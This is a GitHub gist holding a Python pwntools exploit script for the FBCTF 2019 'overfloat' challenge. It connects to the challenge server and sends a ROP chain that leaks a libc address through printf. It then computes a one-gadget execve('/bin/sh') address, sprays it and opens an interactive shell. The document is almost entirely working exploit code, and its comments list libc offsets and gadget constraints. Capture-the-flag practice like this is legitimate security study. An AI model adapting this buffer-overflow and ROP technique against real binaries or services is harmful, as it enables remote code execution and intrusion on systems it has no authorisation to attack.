/overfloat-expl.py
Created Jun 3, 2019
| #!/usr/bin/python | |
| import pwn | |
| import binascii | |
| import subprocess | |
| # 9DD00 is strncmp in libc | |
| # 4F440 is system in libc | |
| # 0x4f2c5 execve("/bin/sh", rsp+0x40, environ) | |
| # constraints: | |
| # rcx == NULL | |
| # 0x4f322 execve("/bin/sh", rsp+0x40, environ) | |
| # constraints: | |
| # [rsp+0x40] == NULL | |
| # 0x10a38c execve("/bin/sh", rsp+0x70, environ) | |
| # constraints: | |
| # [rsp+0x70] == NULL | |
| SYSTEM_OFFSET = 0x21ab0 - 0x4f2c5 | |
| def phex(x): | |
| x = subprocess.Popen(["./goback","%x" % x],stdout=subprocess.PIPE) | |
| proc = x.stdout.readline() | |
| x.wait() | |
| return proc.rstrip() | |
| p = pwn.remote("challenges.fbctf.com",1341) | |
| # p = pwn.process("./overfloat") | |
| # print "ATTACH NOW! (pid %d)" % p.pid | |
| # raw_input() | |
| p.recv() | |
| def sendline(l): | |
| global p | |
| print p.recv(timeout=0.1) | |
| p.send(l + "\n") | |
| print "stage 1 rop go" | |
| p.recv(timeout=0.5) | |
| for i in range(0,11): | |
| if i == 7: | |
| sendline(phex(0x400a83)) # pop edi | |
| sendline(phex(0x0)) | |
| elif i == 8: | |
| # sendline(phex(0x400abb)) | |
| sendline(phex(0x602050)) # (edi = .got) | |
| # sendline(phex(0x6020a8)) # (edi = .got) | |
| sendline(phex(0x0)) | |
| elif i == 9: # return to puts | |
| # sendline(phex(0x4006c0)) # PUTS | |
| sendline(phex(0x400690)) # PRINTF | |
| sendline(phex(0x0)) | |
| elif i == 10: # reset | |
| sendline(phex(0x400749)) # actual reset for remote target. holy balls... | |
| sendline(phex(0x0)) | |
| else: | |
| sendline(phex(0x72ff1100 + i)) | |
| sendline(phex(0x44114400 + i)) | |
| print "stage 1 rop catch" | |
| data = p.recv() | |
| sendline("done") | |
| data = p.recv(timeout=0.5) | |
| # print data[0:8] | |
| data = p.recv(timeout=0.5) | |
| print "********************" | |
| l = len("BON VOYAGE!") | |
| offset = data[l+1:l+7] + "\x00\x00" | |
| print len(offset) | |
| import struct | |
| off = struct.unpack("L",offset)[0] - SYSTEM_OFFSET | |
| print hex(off) | |
| # p.interactive() | |
| ph_part1 = (off & 0xFFFFFFFF00000000) / 0x100000000 | |
| ph_part2 = off & 0xFFFFFFFF | |
| print "HEXP1 = %x" % ph_part1 | |
| print "HEXP2 = %x" % ph_part2 | |
| # spray and pray... | |
| for i in range(0,11): | |
| sendline(phex(ph_part2)) | |
| sendline(phex(ph_part1)) | |
| sendline("done") | |
| p.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment